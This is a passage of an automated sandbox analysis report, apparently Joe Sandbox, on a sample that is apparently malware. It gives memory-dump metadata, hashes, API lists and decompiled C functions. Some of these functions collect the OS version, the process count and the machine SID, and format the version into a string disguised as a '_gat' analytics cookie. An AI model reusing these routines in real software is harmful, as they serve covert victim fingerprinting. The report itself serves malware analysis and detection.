Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: 6d06b5c9f46de25dd857d0f4164dfeef269b619a61adeea4f36b6814e10850c8
Instruction ID: 8c64138a27b2759353e3f9304983b60fd231fcf5434f126430698a5108272576
Opcode Fuzzy Hash: 6d06b5c9f46de25dd857d0f4164dfeef269b619a61adeea4f36b6814e10850c8
Instruction Fuzzy Hash: 33111CB1A083098F8308DF29D94495BFBE5FFC8714F058A2EF49993315DB74D9448BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0025098E, Relevance: 1.5, Strings: 1, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00250B26

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ced53db901b8c2159507b0c4c59b7cf56df6282483af8a996ce460ef73e6b0e9
Instruction ID: af92f73fa8e97ea61a3646724dd2ff0ab81eaac94af2023da86f8679a1bd01ac
Opcode Fuzzy Hash: ced53db901b8c2159507b0c4c59b7cf56df6282483af8a996ce460ef73e6b0e9
Instruction Fuzzy Hash: AC61673067070756DB389E688CD2BBEB3A5AB4170AF14051EED42DB282E6B09D7DC70D

Uniqueness

Uniqueness Score: -1.00%

Function 00290890, Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28f000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b584e9bdf3c9cb250278f6fd8a3c2c048db5b18f95540e02eba2b2880c9613
Instruction ID: 87e2e581eb5827ee4121b9ae964050b3aa53acb59707ee89e9b41df608077f2b
Opcode Fuzzy Hash: 22b584e9bdf3c9cb250278f6fd8a3c2c048db5b18f95540e02eba2b2880c9613
Instruction Fuzzy Hash: 07F1895284E7C11FD75387741C662817FB26E13148B4F8ADBC4D1DF4A3E2889A1EE7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00290683, Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28f000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8f3aa62001406569a41c3bfb129c216f34f5140563f5773fb4b8fd8627cf5d
Instruction ID: d8b4679bd89d41974db8a0c5e8240fd0bf0470f97a524e50c867f82340861eaf
Opcode Fuzzy Hash: 8c8f3aa62001406569a41c3bfb129c216f34f5140563f5773fb4b8fd8627cf5d
Instruction Fuzzy Hash: C391545544E3C04FD7078B7458662817FB1AE47118B4F86DBC4C5DF8B3D29C8A4AD7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0026416F, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20b38bd8d4c53eec952cb7d1260526650306d7ba1f805d70f6a5ea3bc58727f
Instruction ID: 0fe6a49df3ddd72fe08485238769c92620401787aac1d71aabd7322d97530977
Opcode Fuzzy Hash: d20b38bd8d4c53eec952cb7d1260526650306d7ba1f805d70f6a5ea3bc58727f
Instruction Fuzzy Hash: 7F21B673F20539477B0CC47E8C5627DB6E1C68C641745423AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 013000C9, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568355205.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1300000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
Instruction ID: bae83fcc66bcc6a22eb89a1af262475e76ef96604cafe247345d7d05cbfbf16c
Opcode Fuzzy Hash: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
Instruction Fuzzy Hash: 5C11E6773401049FD718CE59EC91FA7B3DAEB99274B298066ED08CB341D676EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0028F73F, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28f000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
Instruction ID: bd7c30fe1f4859fe76dcd54a17fafbcd374f29992c77a97faa611356cd313603
Opcode Fuzzy Hash: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
Instruction Fuzzy Hash: F711B1773502009FE794EE55DC81EA2B3AAEB89330B298066ED08CB345E675EC52C760

Uniqueness

Uniqueness Score: -1.00%

Function 0025D81F, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48fb06d8dedac0e8ffb7419dced430a7ef92fba206a6a54ae7ad2c7189c407c3
Instruction ID: 1b36b69ddbda8170e6627de4d124016c40c4a19081d656e37d25e2d3eb3fad89
Opcode Fuzzy Hash: 48fb06d8dedac0e8ffb7419dced430a7ef92fba206a6a54ae7ad2c7189c407c3
Instruction Fuzzy Hash: 9AE08C32921268EBCB24DB88C90898AF3FCEB89B06B154496B901E3101C270EE05CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 000D1C4A, Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 105
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000D1C4A(WCHAR* __ecx) {
				intOrPtr _v256;
				intOrPtr _v268;
				intOrPtr _v280;
				void _v284;
				void _v296;
				intOrPtr _v300;
				WCHAR* _v324;
				_Unknown_base(*)()* _t26;
				int _t29;
				signed int _t32;
				_Unknown_base(*)()* _t36;
				WCHAR* _t49;
				void* _t53;
				WCHAR* _t57;
				signed int _t61;
				signed int _t62;
				signed int _t63;

				_t57 = __ecx;
				_v324 = __ecx;
				memset( &_v284, 0, 0x11c);
				_v284 = 0x11c;
				_t26 = GetProcAddress(LoadLibraryA("NTDLL.DLL"), "RtlGetVersion");
				if(_t26 == 0) {
					L3:
					_t49 = L"%s%u";
					_t61 = wsprintfW(_t57, _t49, L"; _gat=", _v280);
					_t29 = wsprintfW( &(_t57[_t61]), _t49, ".", _v268);
					_push(_v256);
				} else {
					_push( &_v284);
					if( *_t26() == 0) {
						goto L3;
					} else {
						_t49 = L"%s%u";
						_t61 = wsprintfW(_t57, _t49, L"; _gat=", 0);
						_t29 = wsprintfW( &(_t57[_t61]), _t49, ".", 0);
						_push(0);
					}
				}
				_t62 = _t61 + _t29;
				_t63 = _t62 + wsprintfW( &(_t57[_t62]), _t49, ".");
				_t32 = 9;
				memset( &_v296, 0, _t32 << 2);
				_t36 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), "GetNativeSystemInfo");
				if(_t36 != 0) {
					 *_t36( &_v296);
				}
				_t53 = 9;
				return wsprintfW(_v300 + _t63 * 2, _t49, ".", ((0 | _v296 != _t53) - 0x00000001 & 0x00000020) + 0x20) + _t63;
			}

0x000d1c5e
0x000d1c63
0x000d1c67
0x000d1c6f
0x000d1c84
0x000d1c8c
0x000d1cc3
0x000d1ccd
0x000d1cdf
0x000d1ceb
0x000d1ced
0x000d1c8e
0x000d1c92
0x000d1c97
0x00000000
0x000d1c99
0x000d1c9f
0x000d1caf
0x000d1cbd
0x000d1cbf
0x000d1cbf
0x000d1c97
0x000d1cf1
0x000d1d06
0x000d1d0a
0x000d1d14
0x000d1d22
0x000d1d2a
0x000d1d31
0x000d1d31
0x000d1d37
0x000d1d67

APIs

memset.MSVCRT ref: 000D1C67
LoadLibraryA.KERNEL32(NTDLL.DLL,RtlGetVersion,7742C0B0,000D45C0,00000000), ref: 000D1C7D
GetProcAddress.KERNEL32(00000000), ref: 000D1C84
wsprintfW.USER32 ref: 000D1CAD
wsprintfW.USER32 ref: 000D1CBD
wsprintfW.USER32 ref: 000D1CD9
wsprintfW.USER32 ref: 000D1CEB
wsprintfW.USER32 ref: 000D1CFD
LoadLibraryA.KERNEL32(KERNEL32.DLL,GetNativeSystemInfo), ref: 000D1D1B
GetProcAddress.KERNEL32(00000000), ref: 000D1D22
wsprintfW.USER32 ref: 000D1D56

Strings

KERNEL32.DLL, xrefs: 000D1D16
%s%u, xrefs: 000D1C9F, 000D1CAB, 000D1CB8, 000D1CCD, 000D1CD7, 000D1CE6, 000D1CF8, 000D1D51
; _gat=, xrefs: 000D1CA6, 000D1CD2
RtlGetVersion, xrefs: 000D1C73
NTDLL.DLL, xrefs: 000D1C78
GetNativeSystemInfo, xrefs: 000D1D0F

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: wsprintf$AddressLibraryLoadProc$memset
String ID: %s%u$; _gat=$GetNativeSystemInfo$KERNEL32.DLL$NTDLL.DLL$RtlGetVersion
API String ID: 345964358-2230512533
Opcode ID: c51038d77ea50a73f719701958579756483e1020c9545da410b382e5c8471606
Instruction ID: 74fe0bc559d715e254ba92cdc1943c90d4e95bbc22ef82f01907923eb1b5733e
Opcode Fuzzy Hash: c51038d77ea50a73f719701958579756483e1020c9545da410b382e5c8471606
Instruction Fuzzy Hash: 0E3198726507047FE3109BA4FC46FAA7B9CEB44B40F410927FA05D7391FA75EA0446B5

Uniqueness

Uniqueness Score: -1.00%

Function 0012CA24, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00003020), ref: 0012CA4C
GetDlgItem.USER32(?,00003020), ref: 0012CA77
GetWindowRect.USER32(00000000,?), ref: 0012CA92
MapDialogRect.USER32(?,?), ref: 0012CABA
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000020,00000016), ref: 0012CAE4
GetDlgItem.USER32(?,00000001), ref: 0012CAF5
GetWindowRect.USER32(00000000,?), ref: 0012CB07
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015,?), ref: 0012CB2B
GetWindowRect.USER32(?,?), ref: 0012CB40
GetWindowRect.USER32(?,?), ref: 0012CBA3
GetDlgItem.USER32(?,00000001), ref: 0012CBBA
GetWindowRect.USER32(00000000,?), ref: 0012CBC9
GetDlgItem.USER32(?,00000001), ref: 0012CBF2
ShowWindow.USER32(00000000,00000000), ref: 0012CC01
EnableWindow.USER32(00000000,00000000), ref: 0012CC0A

Strings

, xrefs: 0012CAB3

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Rect$Item$DialogEnableShow
String ID:
API String ID: 763981185-3916222277
Opcode ID: 32311413cec2120ec7220835569562d4646ab49f8dbcb76c2fa7206595d8bd92
Instruction ID: a1db2d2fbffcac5c5b7ce2d29ae12f8980b3ad7097c7a0776093df15b709230f
Opcode Fuzzy Hash: 32311413cec2120ec7220835569562d4646ab49f8dbcb76c2fa7206595d8bd92
Instruction Fuzzy Hash: A4613A71A00219AFDB14EFA5ED89ABFBBF9FF99700F100129F515A2251DB709911CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0011F070, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0011F0A6
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 0011F0C9
GetWindowRect.USER32(?,00000000), ref: 0011F0EC
MonitorFromWindow.USER32(00000000,00000001), ref: 0011F155
GetMonitorInfoW.USER32(00000000), ref: 0011F15C
CopyRect.USER32(?,?), ref: 0011F16A
GetWindowRect.USER32(00000000,?), ref: 0011F177
MonitorFromWindow.USER32(00000000,00000002), ref: 0011F184
GetMonitorInfoW.USER32(00000000), ref: 0011F18B
CopyRect.USER32(?,?), ref: 0011F199
GetParent.USER32(?), ref: 0011F1A4
GetClientRect.USER32(00000000,?), ref: 0011F1B1
GetClientRect.USER32(00000000,?), ref: 0011F1BC
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0011F1CA

Strings

(, xrefs: 0011F137

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$Window$Monitor$ClientCopyFromInfoParent$MessagePointsSend
String ID: (
API String ID: 3903363758-3887548279
Opcode ID: 1c47bf830cf0795e97dadd442f72ec24231e49187b05296d216509e76245c38e
Instruction ID: f0b118cb77ab6e2fbf76bb37c51f31554c522b42bc060e3a8a96477bdd0d1f04
Opcode Fuzzy Hash: 1c47bf830cf0795e97dadd442f72ec24231e49187b05296d216509e76245c38e
Instruction Fuzzy Hash: BF614C72900609EFCB04DFA8ED89BEEB7B9FB89310F150228E505E7150DB74E9468B60

Uniqueness

Uniqueness Score: -1.00%

Function 0014EBAD, Relevance: 27.2, APIs: 18, Instructions: 240COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0014EBB7
CopyImage.USER32 ref: 0014EBF1
GetObjectW.GDI32(?,00000018,?,00000184,00151B70,00000000,00000000), ref: 0014EC2B
DeleteObject.GDI32(?), ref: 0014ECA4
GetObjectW.GDI32(?,00000018,?,00000000), ref: 0014ECEE
GetObjectW.GDI32(?,00000018,?), ref: 0014ED38
SelectObject.GDI32(?,?), ref: 0014ED57

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$CopyDeleteH_prolog3_ImageSelect
String ID:
API String ID: 1817775128-0
Opcode ID: 77d8ccf0fa1af0e30ef3176186ed82fbaae22bc8cf470aaf7c3ab4338c69a0c1
Instruction ID: 1831b605c9f295319a1eca9d2c22bd9c9d0e6e3f5e08b21f9e6d4e0633e71d76
Opcode Fuzzy Hash: 77d8ccf0fa1af0e30ef3176186ed82fbaae22bc8cf470aaf7c3ab4338c69a0c1
Instruction Fuzzy Hash: ABA10771901629EFDB259F60DC48BEEBBB4FF19311F0041A9E50DA2260DB709E94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00150FD6, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00150FE0

Strings

(, xrefs: 001510FE

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: H_prolog3_
String ID: (
API String ID: 2427045233-3887548279
Opcode ID: 5ada2f572b2e85ac8c4fa73ecc0bbb65551f5054b72a889862a8587f0c395f2d
Instruction ID: 79b44e58a062232d9865685bb367370b4bf6e090aab6090a9754ad71c5cfc366
Opcode Fuzzy Hash: 5ada2f572b2e85ac8c4fa73ecc0bbb65551f5054b72a889862a8587f0c395f2d
Instruction Fuzzy Hash: CEC15930900229DFEB25DF64DC94BADBBB5FF55301F0081EAE95DAA251DB708A84CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00153754, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0015375E
GetObjectW.GDI32(?,00000018,?,00000000), ref: 001537E5
SelectObject.GDI32(?,?), ref: 00153813
SelectObject.GDI32(?,?), ref: 001538A4
SelectObject.GDI32(?,00000000), ref: 001538B3
SelectObject.GDI32(?,?), ref: 001538C6
DeleteObject.GDI32(?), ref: 001538CE
SelectObject.GDI32(?,?), ref: 00153A1F
SelectObject.GDI32(?,?), ref: 00153A2B

Strings

(, xrefs: 0015386E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Select$DeleteH_prolog3_
String ID: (
API String ID: 110854720-3887548279
Opcode ID: c0b7f834ee26eac08f2b7487213494d1a1fe3facf111c4190f9a2de458ff0a58
Instruction ID: 42b96785fc33e9d3c56732942700ec6609545f6a796aaa38929729c88860ecc6
Opcode Fuzzy Hash: c0b7f834ee26eac08f2b7487213494d1a1fe3facf111c4190f9a2de458ff0a58
Instruction Fuzzy Hash: 5DA16871D00208DFCF14EFA4D884AAEBBB5FF58341F204129E826AB261DB709E55CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001351B8, Relevance: 21.2, APIs: 14, Instructions: 173windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001351BF
GetIconInfo.USER32(?,?), ref: 00135260
GetObjectW.GDI32(?,00000018,?), ref: 0013526F
CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 001352BA
SelectObject.GDI32(?,00000000), ref: 001352CF
FillRect.USER32(?,?,-00000098), ref: 0013530A
DrawIconEx.USER32(?,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 0013532B
SelectObject.GDI32(?,?), ref: 0013533C
DeleteObject.GDI32(?), ref: 00135345
DeleteObject.GDI32(?), ref: 0013535A
DeleteObject.GDI32(?), ref: 00135363
DestroyCursor.USER32(?), ref: 001353B6
DestroyCursor.USER32(?), ref: 001353C3
DestroyCursor.USER32(?), ref: 001353CE

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$CursorDeleteDestroy$IconSelect$CopyDrawFillH_prolog3_ImageInfoRect
String ID:
API String ID: 2617690191-0
Opcode ID: ee0d5edac77bbf81f0cd77a9d156462c6d8b1625aa5f59907bfb7a8e1ed8daa9
Instruction ID: 5d48c27a481fe18d026f746d22b88951310f883e6adaf3b73b491ceab057b009
Opcode Fuzzy Hash: ee0d5edac77bbf81f0cd77a9d156462c6d8b1625aa5f59907bfb7a8e1ed8daa9
Instruction Fuzzy Hash: FA6124B1900609DFDB15DFA4E849AEEBBBAFB58700F258129F801A7261DB709D41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 000D1828, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E000D1828(void* __ecx) {
				signed int _v8;
				void* _t7;
				void* _t8;
				long _t11;
				signed int _t14;
				void* _t17;
				void* _t25;
				_Unknown_base(*)()* _t27;
				void* _t30;
				void* _t32;

				_t32 = 0;
				_t27 = 0;
				_v8 = _v8 & 0;
				do {
					if(_t27 != 0) {
						L3:
						_t7 =  *_t27(5, _t32, _v8,  &_v8);
						if(_t7 != 0xc0000004) {
							if(_t7 != 0) {
								if(_t32 != 0) {
									HeapFree(GetProcessHeap(), 0, _t32);
								}
								L18:
								_t8 = 0;
								L19:
								return _t8;
							}
							L11:
							if(_t32 == 0) {
								goto L18;
							}
							_t11 =  *_t32;
							_t25 = _t32;
							_t30 = 1;
							while(_t11 != 0) {
								_t25 = _t25 + _t11;
								_t30 = _t30 + 1;
								_t11 =  *_t25;
							}
							HeapFree(GetProcessHeap(), _t11, _t32);
							_t8 = _t30;
							goto L19;
						}
						_t14 = _v8;
						if(_t14 == 0) {
							goto L18;
						}
						goto L5;
					}
					_t27 = GetProcAddress(LoadLibraryA("NTDLL.DLL"), "ZwQuerySystemInformation");
					if(_t27 == 0) {
						goto L11;
					}
					goto L3;
					L5:
					_push(_t14 + 1);
					if(_t32 == 0) {
						_t17 = HeapAlloc(GetProcessHeap(), 8, ??);
					} else {
						_t17 = HeapReAlloc(GetProcessHeap(), 8, _t32, ??);
					}
					_t32 = _t17;
				} while (_t32 != 0);
				goto L18;
			}

0x000d1835
0x000d1837
0x000d1839
0x000d183c
0x000d183e
0x000d185d
0x000d1867
0x000d186e
0x000d18a0
0x000d18c9
0x000d18d1
0x000d18d1
0x000d18d7
0x000d18d7
0x000d18d9
0x000d18df
0x000d18df
0x000d18a2
0x000d18a4
0x00000000
0x00000000
0x000d18a6
0x000d18aa
0x000d18ac
0x000d18b4
0x000d18af
0x000d18b1
0x000d18b2
0x000d18b2
0x000d18bd
0x000d18c3
0x00000000
0x000d18c3
0x000d1870
0x000d1875
0x00000000
0x00000000
0x00000000
0x000d1875
0x000d1857
0x000d185b
0x00000000
0x00000000
0x00000000
0x000d1877
0x000d1878
0x000d187b
0x000d1890
0x000d187d
0x000d1883
0x000d1883
0x000d1896
0x000d1898
0x00000000

APIs

LoadLibraryA.KERNEL32(NTDLL.DLL,ZwQuerySystemInformation), ref: 000D184A
GetProcAddress.KERNEL32(00000000), ref: 000D1851
GetProcessHeap.KERNEL32(00000008,00000000,?), ref: 000D1880
HeapReAlloc.KERNEL32(00000000), ref: 000D1883
GetProcessHeap.KERNEL32(00000008,?), ref: 000D188D
HeapAlloc.KERNEL32(00000000), ref: 000D1890
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D18BA
HeapFree.KERNEL32(00000000), ref: 000D18BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D18CE
HeapFree.KERNEL32(00000000), ref: 000D18D1

Strings

NTDLL.DLL, xrefs: 000D1845
ZwQuerySystemInformation, xrefs: 000D1840

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocFree$AddressLibraryLoadProc
String ID: NTDLL.DLL$ZwQuerySystemInformation
API String ID: 2708089030-2445179936
Opcode ID: a88409a762784f2c029f654abcbfe4db3a1851bde3c25a512d3f15c70bf62149
Instruction ID: e391bf76f0122ca89ecceb9db27404713af22bf00c5f24784dede8b42d549fdb
Opcode Fuzzy Hash: a88409a762784f2c029f654abcbfe4db3a1851bde3c25a512d3f15c70bf62149
Instruction Fuzzy Hash: BD118472E423147BE76196A5AC48BBF7A9CEF45B95F110116FE09D7340DE74CC0166B0

Uniqueness

Uniqueness Score: -1.00%

Function 0012C141, Relevance: 19.8, APIs: 13, Instructions: 251memorywindowCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000004,?), ref: 0012C220
GlobalFix.KERNEL32(00000000), ref: 0012C229
GlobalUnWire.KERNEL32(00000000), ref: 0012C23A
SetPropW.USER32(?,00000000), ref: 0012C24A
GlobalFree.KERNEL32(00000000), ref: 0012C255
IsWindowEnabled.USER32(00000000), ref: 0012C2FB
EnableWindow.USER32(00000000,00000000), ref: 0012C307
GetCapture.USER32 ref: 0012C314
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0012C323
EnableWindow.USER32(00000000,00000001), ref: 0012C3FD
GetActiveWindow.USER32 ref: 0012C407
SetActiveWindow.USER32(00000000), ref: 0012C413
EnableWindow.USER32(00000000,00000001), ref: 0012C451

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Global$Enable$Active$AllocCaptureEnabledFreeMessagePropSendWire
String ID:
API String ID: 3599030855-0
Opcode ID: 7f4212e69d3f97c1696f8abf00cf98b23a1e73a172582edf97f3d5bf9a4ae614
Instruction ID: f9890671e9f2d3842d7435e148e262ca34b91589bd36978850523af24d76bdda
Opcode Fuzzy Hash: 7f4212e69d3f97c1696f8abf00cf98b23a1e73a172582edf97f3d5bf9a4ae614
Instruction Fuzzy Hash: 3391E430B00626EBDB18AFB4E859BAEB7A8BF54310F144529FA15D7281DF74D861CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 000D1725, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000D1725(void* __edx) {
				char _v96;
				short _v108;
				union _SID_NAME_USE _v112;
				long _v116;
				long _v120;
				char* _t19;
				long _t28;
				signed int _t40;
				void* _t45;
				void* _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t51;
				void* _t52;

				_t51 = 5;
				_v108 = 0x2f;
				_t19 =  &_v96;
				_t45 = __edx;
				__imp__GetComputerNameExW(0, _t19,  &_v108);
				if(_t19 == 0 || LookupAccountNameW(0,  &_v108, 0,  &_v116,  &_v108,  &_v120,  &_v112) != 0 || GetLastError() != 0x7a) {
					L15:
					return 0;
				} else {
					_t28 = _v116;
					if(_t28 == 0) {
						goto L15;
					}
					_t52 = HeapAlloc(GetProcessHeap(), 8, _t28 + 1);
					if(_t52 == 0) {
						goto L15;
					}
					if(LookupAccountNameW(0,  &_v108, _t52,  &_v116,  &_v108,  &_v120,  &_v112) == 0) {
						HeapFree(GetProcessHeap(), 0, _t52);
						goto L15;
					}
					_t40 =  *(_t52 + 1) & 0x000000ff;
					if(_t40 < _t51) {
						_t51 = _t40;
					}
					_t16 = _t52 + 8; // 0x8
					_t47 = _t16;
					_t50 = _t51 << 2;
					if(_t45 == 0 || _t47 == 0 || _t50 == 0) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t52);
						return _t51;
					} else {
						_t46 = _t45 - _t47;
						do {
							 *((char*)(_t46 + _t47)) =  *_t47;
							_t47 = _t47 + 1;
							_t50 = _t50 - 1;
						} while (_t50 != 0);
						goto L13;
					}
				}
			}

0x000d172e
0x000d1733
0x000d173c
0x000d1744
0x000d1746
0x000d174e
0x000d181e
0x00000000
0x000d178c
0x000d178c
0x000d1792
0x00000000
0x00000000
0x000d17ab
0x000d17af
0x00000000
0x00000000
0x000d17d5
0x000d1818
0x00000000
0x000d1818
0x000d17d7
0x000d17dd
0x000d17df
0x000d17df
0x000d17e3
0x000d17e3
0x000d17e6
0x000d17eb
0x000d1802
0x000d1808
0x00000000
0x000d17f5
0x000d17f5
0x000d17f7
0x000d17f9
0x000d17fc
0x000d17fd
0x000d17fd
0x00000000
0x000d17f7
0x000d17eb

APIs

GetComputerNameExW.KERNEL32(00000000,?,00000100), ref: 000D1746
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 000D176F
GetLastError.KERNEL32 ref: 000D177D
GetProcessHeap.KERNEL32(00000008,?), ref: 000D17A2
HeapAlloc.KERNEL32(00000000), ref: 000D17A5
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 000D17CD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1805
HeapFree.KERNEL32(00000000), ref: 000D1808
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1815
HeapFree.KERNEL32(00000000), ref: 000D1818

Strings

/, xrefs: 000D1733

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
String ID: /
API String ID: 2409119217-2043925204
Opcode ID: 9c8ad6cae950463dc4c723985ab921314512448763078a9900723b411b8b4dd3
Instruction ID: 9c6547ba0fe9ef0073124660ece96cffb27d026960a4124419c20d40a3e08cc4
Opcode Fuzzy Hash: 9c8ad6cae950463dc4c723985ab921314512448763078a9900723b411b8b4dd3
